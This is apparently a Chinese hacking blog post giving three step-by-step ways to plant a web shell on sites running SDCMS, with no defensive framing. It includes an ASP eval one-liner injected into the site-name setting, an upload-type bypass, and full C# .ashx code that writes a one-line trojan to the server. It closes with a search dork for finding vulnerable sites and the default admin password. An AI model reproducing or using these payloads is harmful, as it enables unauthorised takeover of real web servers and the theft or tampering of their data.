第一种方法:
把网站名称内容修改为 "%><%eval request("80lr")' //密码为80lr
用菜刀链接http://www.80lr.com/inc/const.asp 就搞定了。
第二种方法:
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
第三种方法:
文件名写入getshell.ashx
内容写入下面内容:
/====================复制下面的=========================/
<%@ WebHandler Language="C#" Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
file1.Write("<%response.clear:execute request(\"80lr\"):response.End%>");
file1.Flush();
file1.Close();
}
public bool IsReusable {
get {
return false;
}
}
}
/=============================================/
访问这个地址:http://www.80lr.com/skins/2009/getshell.ashx
会在http://www.80lr.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为80lr 用菜刀链接
送上关键词:intitle:"Powered By SDCMS"
后台http://www.80lr.com/admin/ 默认用户和密码:sdcms
本文来自易寒网络,转载务必注明原文链接:http://www.80lr.com/oday/241.html